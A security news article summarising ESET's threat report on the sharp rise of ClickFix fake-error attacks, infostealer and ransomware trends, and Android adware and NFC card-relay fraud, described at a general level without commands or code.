ClickFix attacks skyrocketing more than 500%

ClickFix, a deceptive attack method, saw a surge of more than 500% in the first half of 2025, making it the second most common attack vector after phishing, according to ESET’s latest Threat Report. The report, which looks at trends from December 2024 to May 2025, found that ClickFix accounted for nearly 8% of all blocked attacks during this period.

Fake reCAPTCHA check instructing the victim to paste and execute a malicious command on their device (Source: ESET)

ClickFix attacks trick users by showing a fake error message that gets them to copy, paste, and run harmful commands on their devices. This method works across all major operating systems, including Windows, Linux, and macOS.

Jiří Kropáč, Director of Threat Prevention Labs at ESET said: “The list of threats that ClickFix attacks lead to is growing by the day, including infostealers, ransomware, remote access trojans, cryptominers, post-exploitation tools, and even custom malware from nation-state-aligned threat actors.”

Infostealers

The infostealer landscape shifted noticeably in the first half of 2025. As Agent Tesla declined, SnakeStealer (also known as Snake Keylogger) became the most commonly detected infostealer in ESET’s telemetry. It can log keystrokes, steal saved credentials, take screenshots, and collect clipboard data.

ESET also took part in major disruption efforts against Lumma Stealer and Danabot, two malware-as-a-service tools. Before those operations, Lumma Stealer activity rose 21% compared to the second half of 2024, while Danabot jumped 52%. Both were active threats, which made taking them down especially important.

Ransomware

The ransomware scene grew more chaotic in 2024, with clashes between rival gangs affecting several major players, including RansomHub, one of the leading ransomware-as-a-service groups. While the number of attacks and active gangs increased over the year, ransom payments dropped.

This gap may reflect the impact of law enforcement takedowns and exit scams that disrupted the market, but it could also point to growing distrust in gangs following through on their promises after payment.

Mobile

On Android, adware detections rose by 160%, mainly due to a new threat called Kaleidoscope. This malware uses a lookalike app tactic to trick users into installing fake apps that flood devices with ads and slow them down.

NFC-based fraud also jumped by more than 35 times, driven by phishing campaigns and new relay techniques. While the total number of cases is still relatively low, the sharp rise shows how quickly attackers are adapting and continuing to target NFC technology.

ESET’s research into GhostTap shows how attackers steal card details and load them into digital wallets to make fraudulent contactless payments. These operations are often run by organized fraud groups using multiple phones to scale up the attacks. Another tool, SuperCard X, offers NFC theft as a barebones malware-as-a-service kit. Disguised as a legitimate NFC app, it silently captures and relays card data from infected devices in real time, enabling fast fraudulent transactions.